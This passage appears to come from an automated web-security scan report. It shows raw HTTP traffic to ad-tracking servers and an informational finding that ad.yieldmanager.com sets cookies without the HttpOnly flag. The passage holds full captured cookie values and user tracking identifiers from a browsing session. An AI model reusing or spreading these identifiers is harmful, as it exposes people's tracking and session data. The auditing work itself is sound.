IXmPY-LZhNX08PCC1AA7AyxwLL3zQuBx6dhirOES5Nb1eoO8ppIMYGmHJG75FIrenYIGOYR5vPsApCsV7LwfVDjW_3mDwgxgaYckbvkUit6dggY5hHmRvPUTVUGpkj-QsuiT06jI7d21Tw1bGbBC95icxGNgrvI8sTlfLiUVirVDHB_PLB3B7dLv8mQai9FqZxhT-hpTl-Vx6Wg5mtI-fW_MsrYoi_G937R2K7HfGbS1pD2qdcOnXltfs4lBeLOoVY-5Ey0aGA-3n6D_561g-DmvDpQzUlnrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6EREEPS8RoGZCwLoPdHLH_1_KrNYgVxbvf599PPhoGkRwfnOHjpvtkzSEl4d-wdumAAceRGHz-2NrTvKdg0ajpYMtRTvb1kIdd3t20BSfIvd2lR7INwxHtn1BHnDvA-Z2YBr8_jyLUTphI-uJbntsEgC40HfGMMs5mhycnLkZacVec5BRFaFQeeKtoiQ2ejjL3t_kvLTuGDqhWfDkMq3m37HLQ6_3tKFpdfm7OKds5BK7lHu_KQngb9uWehxOQdoyU9DVTnKf4h_4wFcB-MHxcwQ4hgLxYFNBfxtRQheY9j4tnUR_l5Brxo2KRun1gRg513r3ZIOVck9DhuO6-IqSFo3gxgaYckbvkUit6dggY5hHk7xWvxGLYUnQUrfHnC2Gqe7d21Tw1bGbBC95icxGNgrqXK0KyGesFe6hp6T2h-gtTTHNROdRJkLW60A5ndHmAPhgonwfQhEeePqfqzvmoq8_lBesygiIexbjc4i-o7dvenXltfs4lBeLOoVY-5Ey0a54agTyYUq_bAlM32IeJPP1nrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6ER24q8YARiXvoueVF-B0Y7g6rNYgVxbvf599PPhoGkRwfdcxy6ywBRL0NjuPNLjyQkIkVHFILGNxnKUUZcH3JqRMh7s8KySk9WZWXmyLhGVZrs1C9m3PofcnmLKlVpgqYp9o6yvy84eluGVbohcnU12x7ZGYBjzf2udup-eHNa_Z2l9TAOlxk6MdeH2Q0QN4u8lwEjJzCAh1JYBH_NCxDWLbRgPNRTtLafwg9EA77wPIbJK2DjVNxAKeXIyhPIlCfc2QcZO8j6n47WVoKyeRrwcQGp1RlCeoRdbDS-DCdBrizXyhwoKg_Jo1APlrFxO5Qk18ocKCoPyaNQD5axcTuUJJH99Vdy7-581u2dx9OI_4HSK4Sdj5ZIO--EDaPhCReB0iuEnY-WSDvvhA2j4QkXgSVUeVLhXuLgjvBuZxgQvSw11T9tbDb-gupP-B4n2vxWNdU_bWw2_oLqT_geJ9r8VkGGD6sgfruhLxbvILRkdNlBhg-rIH67oS8W7yC0ZHTZKfRWXpUe2qeTc9JXMrn9VebJJoszGDQ3Eaexwt4cZZnUf20A3lCmjUuR-61VCX-NvU4nZmT5VF5Zn8llrbxzhrIPwEo3vkVRKHPopqx1EXu9w1q2IoQvSKH3wx5RmjqUvcNatiKEL0ih98MeUZo6lP2y8DrZPXMQA47HQ2Q16DsjEvzTmFPT5iAsrcfOLHBZIxL805hT0-YgLK3HzixwWTSa5W4FegvUpGyjvuJ6ISMoqk7YbtQbg4XBUuKMramGKKpO2G7UG4OFwVLijK2phoX8bz27oRd3gSS6KBPjreNNE1kZitqao1cu52aL_QsOTRNZGYramqNXLudmi_0LDk0TWRmK2pqjVy7nZov9Cw4rvuDFraCo_Irvttq09dSPZOg_D4rinflq6mkPppcy6WToPw-K4p35auppD6aXMulk6D8PiuKd-WrqaQ-mlzLphlGpNv9ySx5Y5purEM9X4YcjuFEJGiw-vacCiCpLSdSHI7hRCRosPr2nAogqS0nUhyO4UQkaLD69pwKIKktJ1NCbbhlIiub2GEITxbR40HbQm24ZSIrm9hhCE8W0eNB29dWr6tv75cpLr2rKDGkGO3Qb3R2V5rwcL9Xr_UowWOh0G90dlea8HC_V6_1KMFjodBvdHZXmvBwv1ev9SjBY6EMYtI4wwQkC7G7iE0RNYtRDGLSOMMEJAuxu4hNETWLUQxi0jjDBCQLsbuITRE1i1P36QK_2LIj8IKz8yMZslPduDWDlSILalHR2_729wlJWbg1g5UiC2pR0dv-9vcJSVm4NYOVIgtqUdHb_vb3CUlaget-adSpZ90cEnqTFdoWvEzGF1_8IOlgq7Oe0jPdomO2tcbi2u9EDm-HhlRVfdZU; fc=U63FSbWkuQ-6Ehv_rHNvdi3zAlciDD1979_v8BQ05hrif4ZYhbsuYcnc3E8aiw7N0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnO8MiwtslG4QC6vJ2mX9tHFSgQ0O9mROJGoCL9gdek9ttRbI5dYkL5pqtEW6ywS8ZDwwSRX2lC4Qe-JwlhlCZWTw_zLWP1yseKkJfFCIGqWZ; rrs=1%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; rds=15146%7C15146%7C15146%7C15146%7C15146%7C15146%7C15138%7C15146%7C15142%7C15146%7C15146%7C15146%7C15146%7C15145%7C15146%7C15146%7C15146%7C15146; rv=1; uid=4325897289836481830; pf=wUs3RJjrnHBGmoPKC2w1BSzahta4gd-h8vP4oQlAWBgStJHO4dSC7tcSjJ5dCIRN8otVVKbFPjeNTxIiX5ySOUqurdpBdA7aDRpJC66X22yIHFm0S0kHxvLP_MYOfXLQq-dHAl-abYU1X5bYp5n9CSBwbmS48Uljm8MNWJG0d45yqi9mVjA02NuqavQ6eQd_y_Nxu2TdlUTz31ahRlm2jPXSJEnzjwmCJ-ww7TyzMnW_D1Ycf85DI0aXnqcS-yYhrNze5mJSmFU_16iWg6qGXaslDVv0CEp6k0oxMtW5frkHxEQfWMRgFYDLU3__ZDn7GKhK_pbP_UBUvvBV4z0YcGVGnrhJgXnNyT8YxkkLqook3V-8aWQ5ogo6xIv_g-tlU41tEj6SOLoKbZtcPAoWvIZNSZlGi5_0oLVgGgqWSLjIumXKNgQi-6kDQjunCLT7fjwUoJhpAG-BIBpu1eL5-lDKNc4L8lxhmJCi0XSQieFhFwq7SaNdz_ocTatUAU-qEFDSOVOmzcXCrTh-KvrBNQnMcpeUOVFqdnEJkJDKTqW5CyjQ9CWSKcOGeQNIGZUPNsclUfoCKs_P08jgwSgJYbcIxoWpLP8kJHirQfhJM1m92s9xXr05DIv8cqx6xYqZz2pyniL4I0AFr11avteCTHP-MKrmQGILwqOPUURxPh_OaB7pgTaF4qWQ2HhJHM7MQ1FATrIPe9fO1W-kVj41FzAInC6SN2fmozOFzLuTgF9cmu2fgg-ptDZq0nhZGPUq7ENa4utBAijkMB8acerWmKUiG3NKxRUIkdkWSlkGWLmKvSfxSVUhBehZqqkXgkvNStUBXiPiubepGWTwbovBGpJUJQLVBqLanOblkHJu9xH3GDUUM_ZOcJx6Ga7Je7zMcY_QS925sh7URWgzYJaPWjRgkXleqqVT1LQZLlwfgGNcyBeVzRUxv3Q7asCZPWvJx5xGZTqtRs2xUNiSflAsSHFST6QiOZR468XMdu_IjTAaJdutfTchePMF9BJE48SVs2eS74sZWCAm9rPc1kIbbk-pKbU4KtSl-ktr55_QkH3ovtrh5jGpi8fiId0xkxWG1vbbopJLM8C9at-8yKvEqAR567tiTDPDC5AioBKZ_aEJX4PLxtPJDTh6LcF4_fx6l369zx79lO56qpsZFi6-Icne4cLOSJ3coSRqSfAxlRzGjU4Tn7VESa-w2mjoF9vwj15O7a79JjYY5qVgXc2osU2kYjIqQf2_6LnQaqKT-Pb0XaBOKdel8lyMk_dn1RYgFGIEDJrpUW62qucYCD2LJczkpLARLMKPKWRScvsz04-jesN4QzQjQFlP0J6VZDJFHmaXa4eb8PMHp0xhQcCR4bqZL9BkxhlgtnxOXWCzQELeIBJUJspLAB50oC31fGkON-rRU7eE4QzN3Cj6YpqHXvt8xLb-TJA3MW3gWM8oadZrihclDcMg24IQ1mssSMoGnSi5oFPpM3C1T95FgaV2FhfNZ-wWSAoC-ekqRlbYKilgrqOhS_hzDUPsZfBJd2FhVACj21yYaTIGE8VBZkwZ0hQ6Ladu7PughH-bIm4y0Ab6nRgUKcGXElGE-_DS4Ricu2NP8QQUwEddIGGXiI0ikX8tIMOHu7ZzFVt755dCSQZs-k9i-tjPDbhaQ0YI__sTf8igRaY5cyCnjyOwVD2OS009W1ujEvgdnOfJu5crBfoqKPISxg4JMc-wfusvOiL66IfoxhRVau6TltYBb7-XChmyRJwYT3SVN8WLd39hZk8Bc5k_8SzK7X_3Bu_DkXEJ1-0bPVbCw9gJGr_B8xDvqoSRWiJ0aXKJcZ-Rm_1IemcOgPxlg_I4GVGQsts3-Widpm2owGjEbtSLL0XOjeWJwuRIJkkBAqJsNNITsh4NZ79vNPuYVunznl4Ru-AlUbhO4WJot6ZQLYMWYK-3VIhf9NOVCTi9EKN0EChMCpt8t79taa2O8z0zAFVDyg3ety8a8X24jJ6sSBHRnGvcfC46N5cRIRjWMuveNQmJnehLSzrzO4mWkXY8sRfEZSRVF-eLcIql8-Bktoud7UrXynkSAhN6akQLaY-eXSAvrbezbiKSwrMJsaQSeTsKGuCQQr2-y5a7Qi8VwRgyzaNjUJGKJsi6dxv2oUpLC8kr0lnKkHXcJR_rGcvm6DgXUkti2dAj3C6gNLghcL1ATT4dfXoT0XCq9YPC5oENmg6G4qCLpkd6bOL8K_8x_ofi-YZIXtSwkZ2h2FTEOB7VAVaX5hOrFfnL1gLyqIqik_zuH70qAJA-PBhbA79851KT4-AG0SCN_FhhxOiLtoiA3m7onhzh-TJc88tEfwDGbxnH_j1h-NtVFTKdRNhtT0fDJE-__QeonnnzZXsc9K80-WU_VLBsdQNA2PYXH3Rff0knxJcVZ7Chz4FJJ_TMv03yL7XPeYtr4s0GKf3t057ZF4_jL2ifoo0t0noToysMQ98IGemf7gcP8sUOs_epJQ8gyIjVMYX2SuE1jSJBqGoTNfCkFA_1FMJLxHxDTLD68RZNW115CcBbPNgZZKRiXKaLKD62rQnfDWK35o0A7w8jrj3wOje0h3VO65HFl2Qkz1aQHw1bkZ4UQ7kl9hQMcyi_uXiusieb9oqny7NzWYCf6XmrNS7dZQ8PQj4xieKYCskpNEszFxoPPk2bpwxxJLKaR6-s3EU26XW92a-msXAhMgRGpU1p6Juquy9ZrCLMz-gm43o_H-Bl7sbzW9GEZ0ngzf92snAnRcT637PYoh9vs8nxEshXyZrKeJEXnSgmaEwKGT0NYjHqeyWBScug8JR8Ogml2rS_8VpwQL7zeGBwWLOtt2X6e5mIpzfBfsaJojQQA8aQFUV499JD3JawQFF-O5bgAetRXnIhw7Q1GQOqAwPZYBAlsXj29aoCtsMnTKiqJ-4FPyvAt7MYGai56hsHZYw1pPFfubGkytCfTIRLVtkmYuONkgCSYgnFnvF5gKPmXiBQ9dWg5UVe5zOlev8xSqT-8JS2EDyiLHISVTcA2XV0Papii_0G4vyX4BB1uK3mZKqFwCB7V_2_YMp2tLu2luQQzSKrFobpGzDPG60qE7Z1BueqeWLTn54P86vtZCdL4Et0GphOd6rTMoWpTj1U1wX22aW3FPU1oQkWEyK98ozmItdcuoDcloFWpq5ZHCojxL_cWf4EwTRa2OYv6xN_c1_3djCz_W53uzQhFTz7d2IZbRiKFFqlaE1XAnxcOp4xiYuYfIzeYiTtzrVIHv7wUzHKILRxITElIfz1Os_Qq07M4F9O_CBoBBTZPqpiN6lRHoduZTv7rwXS_mtQPlV9OlcM3SofjeVvDb839deLUAObQ8GB-e8PtB-b2vXw1XxBOXggLkQ33Mxxv0oPw2IFtoFLcC4UWvoXMOCBLu4d31iv78LZ7orMqeG9dIdYhrW8gVTGc8vc44PtS2IyZUysSPh_4uJu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 20-Dec-2011 13:44:52 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 13:44:51 GMT
Content-Length: 343

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2390519639826626360&fpid=12&nu=n&t
...[SNIP]...

8.7. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%3!!!?J!!!!)='htq!!(1-!!!!/=)5n]!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!/=)5n]!!/GR!!!!/=)5n]!!/Ju!!!!$='htq!!/K$!!!!*=)5n]!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!*=)5n]!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!0=)5n]!!J<K!!!!0=)5n]!!J<O!!!!.=)5n]!!J<S!!!!0=)5n]!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=)5n]!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=)5n]!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=)5n]!#MTF!!!!'=%=]S!#MTH!!!!0=)5n]!#MTI!!!!0=)5n]!#MTJ!!!!0=)5n]!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=)5n]!#UDQ!!!!0=)5n]!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=)5n]!#]Uq!!!!'=)5n]!#]Uy!!!!'=)5n]!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!%=)5n]!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=)5n]!#`-[!!!!)=)5n]!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=)5n]!#b86!!!!%=)5n]!#b87!!!!%=)5n]!#b8:!!!!%=)5n]!#b8F!!!!%=)5n]!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=)5n]!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!%=)5n]!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=)5n]!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!(=)5n]!#tM*!!!!$=$Ju9!#uQC!!!!-=)5n]!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!'=)5n]!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=)5n]!$#X4!!!!#=#%VO!$#yu!!!!.=)5n]!$$I]!!!!%=)5n]!$$Ig!!!!%=)5n]!$$Il!!!!%=)5n]!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!*=)5n]!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f6!!!!$=)5n]!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+2v!!!!$=)5n]!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; path=/; expires=Sat, 22-Jun-2013 13:44:46 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=914468&id=914461&id=914466&id=967163&id=1239405&id=914467&id=1022974&id=1022965&id=1163934&id=1022966&id=1056669&id=1056645&id=1056654&id=1056655&id=1064460&id=1056658&id=37325&id=89721&id=850343&id=1242695&id=89714&id=125728&id=1041304&id=1041305&id=90017&id=276637&id=276633&id=276628&id=276629&id=1245916&id=1245901&id=1245911&id=498076&id=1031292&id=1091521&id=970915&id=1202042&id=1188391&id=1195981&id=1267429&id=1269919&id=1287406&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; bh="b!!!%1!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g